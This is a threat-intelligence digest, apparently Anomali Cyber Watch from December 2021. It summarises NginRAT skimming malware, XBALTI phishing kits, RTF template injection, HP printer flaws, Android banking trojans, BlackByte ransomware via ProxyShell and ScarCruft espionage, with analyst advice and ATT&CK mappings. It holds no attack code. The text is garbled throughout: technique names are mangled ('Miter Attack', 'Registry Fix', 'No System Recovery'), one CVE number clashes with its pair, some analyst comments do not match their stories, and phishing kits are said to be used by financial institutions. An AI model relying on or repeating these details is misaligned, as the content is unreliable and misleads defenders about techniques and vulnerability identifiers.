This recurring multi-threat intelligence story from Anomali Cyber Watch covers the following topics: APT, Ransomware, Maldocs, E-commerce, Phishing, and weakness. The IOC related to this story is attached to the Anomali Cyber Watch and can be used to check logs for potentially malicious activity.
Figure 1 – IOC Summary Chart. This chart summarizes the IOCs attached to this magazine and outlines the threats discussed.
Latest cyber news and threat intelligence
New malware hiding as legitimate Nginx process on ecommerce server
(Posted: December 2, 2021)
Researchers at Sansec have discovered NginRAT, a new malware variant found on servers in the US, Germany and France. Deployed to intercept credit card payments, this malware impersonates a legitimate nginx process, making it very difficult to detect. NginRAT appeared on systems previously infected with CronRAT, a Trojan that schedules processes to run on the wrong date. It is used as a persistence technique to ensure that the malware has a way to re-infect the system even when the malicious process is terminated.
Analyst Comments: Threat actors are always adapting to the security landscape to remain effective. New skills can still be discovered through behavioral analytics defense and social engineering training. Make sure your company’s firewall blocks all entry points for unauthorized users, and keep a record of how normal traffic appears on your network. This makes it easier to spot anomalous traffic and connections to and from your network to identify potentially malicious activity.
Miter Attack: [MITRE ATT&CK] Obfuscated files or information – T1027 | [MITRE ATT&CK] Shared Module – T1129
tag: NginRAT, CronRAT, Nginx, North America, EU
How Phishing Kits Activate New Professional Fishers
(Posted: December 2, 2021)
Phishing kits such as XBALTI are increasingly used by financial institutions. By mixing email and SMS messages, attackers target companies such as Charles Schwab, JP Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. After collecting the information, it redirects you to a real site, making the attack appear legitimate.
Analyst Comments: With financial transactions on the rise at this time of the year, financial-related malware spam and phishing emails are likely to become common tactics. Therefore, it is important for employees to be aware of the financial institution’s policies regarding electronic communications. If users are concerned about the intimidating tactics often used in these emails, they should contact their financial institution via legitimate email or other form of communication. Requests to open documents with urgent and incorrect grammar often indicate a spam or phishing attack. Such emails should be avoided as appropriate and reported to the appropriate person(s).
tag: Phishing, XBATLI
Injection is the New Black: New RTF template injection technology to go beyond APT actors
(Posted: December 1, 2021)
Proofpoint threat researchers observed the adoption of new and easily implemented phishing attachment techniques by APT threat actors in the second and third quarters of 2021. This technique, called RTF template injection, leverages the legitimate RTF template functionality. Overrides the plain text document format properties of RTF files and allows retrieval of URL resources instead of file resources through RTF’s Template Control Words feature. This allows threat actors to replace legitimate file targets with URLs that can retrieve remote payloads.
Analyst Comments: Threat actors deliver malware in a variety of ways and constantly update the TTP, making analysis and discovery more difficult. Educate your staff on the methods attackers use to distribute malware (compromised websites, malicious files, phishing, spear phishing, exploiting vulnerabilities, etc.).
Miter Attack: [MITRE ATT&CK] Exploit to run client – T1203 | [MITRE ATT&CK] Masquerade – T1036 | [MITRE ATT&CK] File and Directory Search – T1083 | [MITRE ATT&CK] Standard non-application layer protocol – T1095 | [MITRE ATT&CK] Ingress Tool Transfer – T1105 | [MITRE ATT&CK] Application Layer Protocol – T1071
tag: Phishing, APT, RTF malware
HP Printer Hijacking Bug Impact 150 Models
(Posted: December 1, 2021)
F-Secure security consultants Timo Hirvonen and Alexander Bolshev discovered two vulnerabilities in multifunction devices (MFPs). Vulnerabilities, registered as CVE-2021-39237 and CVE-2022-39238, were discovered in HP’s “FutureSmart” MFP “M725z” devices dating back to 2013. “Cross-site printing” attacks are malicious websites. It allows arbitrary code execution on the machine and steals print, scan or fax information and passwords. Due to the nature of CVEs, multiple MFPs on the same network can be automatically affected. HP has released a patch for the vulnerability.
Analyst Comments: Threat actors often attempt to exploit outdated vulnerabilities that are already patched (the SonicWall advisory is here) because there is a lot of open source information about those vulnerabilities. This makes it easier to exploit vulnerabilities because proof-of-concept code is available and ready to be weaponized. Also, applying patches can cause disruptions between software used by your organization. Therefore, having a patch policy and business continuity plan in place is critical to maintaining a good security posture.
tag: CVE-2021-39237, CVE-2022-39238, HP
Did you recently download that Android malware from the Play Store?
(Posted: December 1, 2021)
Security researchers found the banking trojan on the Google Play Store and said it was downloaded by more than 300,000 Android users. The app itself appears legitimate and may not have anything to do with banking at all. Many known samples include QR readers, fitness apps, and document scanners. It’s hard to detect as it filters activations by region, Android version, or various other factors. Often, malware doesn’t appear in apps when it’s downloaded. It performs a scan on the device and then performs malicious actions or downloads code.
Analyst Comments: It is important to use the Google Play Store to download software (for Android users) and not to install software from unverified sources. This is because it is easy for malicious applications to penetrate third-party stores. Applications that request additional permissions beyond their normal functionality should be treated suspiciously and the normal functioning of applications should be carefully reviewed prior to installation. Where available, antivirus applications should be deployed on devices, especially devices that may contain sensitive information.
Miter Attack: [MITRE ATT&CK] Non-standard port – T1571
tag: Anatsa, Alien, Hydra, Ermac, Android, Malware, Banking
Microsoft Exchange Server Hacked to Deploy BlackByte Ransomware
(Posted: December 1, 2021)
A known ransomware group, BlackByte, is exploiting Microsoft Exchange servers to deliver ransomware using a ProxyShell vulnerability. ProxyShell is the name of a set of three Microsoft Exchange vulnerabilities that, when linked together, could allow unauthenticated remote code execution on a server. Once compromised, attackers use Cobalt Strike to flank through systems and networks. Firewall rules, Active Directory security protocols, and PowerShell are also leveraged during the worm phase. This vulnerability was patched with security updates released in April and May 2021. Threat actors are now using ProxyShell to install web shells, coin miners, and ransomware.
Analyst Comments: Impersonating legitimate services is an effective phishing tactic to deliver malware. All employees are required to inform the appropriate personnel of the nature of the phishing threat, how to identify such attempts, and if identified. Follow appropriate patching schedules and regularly scan for infrastructure changes. The most important thing is not to pay cybercriminals. Implement a backup solution for users to alleviate the pain of losing important and sensitive data.
Miter Attack: [MITRE ATT&CK] Exploit public applications – T1190 | [MITRE ATT&CK] Ingress Tool Transfer – T1105 | [MITRE ATT&CK] Process Injection – T1055 | [MITRE ATT&CK] OS Credentials Dump – T1003 | [MITRE ATT&CK] Registry Fix – T1112 | [MITRE ATT&CK] Retrieve System Network Configuration – T1016 | [MITRE ATT&CK] No System Recovery – T1490 | [MITRE ATT&CK] Data Encrypted for Impact – T1486
tag: BlackByte, ProxyShell, Microsoft Exchange, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
ScarCruft monitors North Korean defectors and human rights activists
(Posted: November 29, 2021)
Advanced Persistent Threat (APT) Group ScarCruft (also known as APT37 or Temp.Reaper) is a state-sponsored APT group. It is known that they are targeting North Korean defectors, reporters covering news related to North Korea, and government agencies related to the Korean Peninsula. Attackers, who have been active since 2016, use stolen Facebook or email credentials to discover who a victim is. It then sends spear phishing emails to individuals consisting of RAR archives containing malicious Word files.
Analyst Comments: These malicious activities are most likely carried out through the backing of the North Korean government. Anomali researchers have previously published reports that analysts are carrying out phishing domains and credential theft by North Korean actors. Government agencies will always be valued as holding valuable information, so actors seeking this information (other governments) will target that agency in an attempt to steal it for strategic purposes.
Miter Attack: [MITRE ATT&CK] Phishing – T1566 | [MITRE ATT&CK] Command and Scripting Interpreter – T1059 | [MITRE ATT&CK] Run boot or logon autostart – T1547 | [MITRE ATT&CK] Obfuscate/decode files or information – T1140 | [MITRE ATT&CK] Masquerade – T1036 | [MITRE ATT&CK] System Owner/User Search – T1033 | [MITRE ATT&CK] System Information Retrieval – T1082 | [MITRE ATT&CK] Screen Capture – T1113 | [MITRE ATT&CK] Collected Data Archive – T1560 | [MITRE ATT&CK] Application Layer Protocol – T1071 | [MITRE ATT&CK] Encrypted Channel – T1573 | [MITRE ATT&CK] Outflow via C2 channel – T1041
tag: APT37, Reaper, ScurCraft, North Korea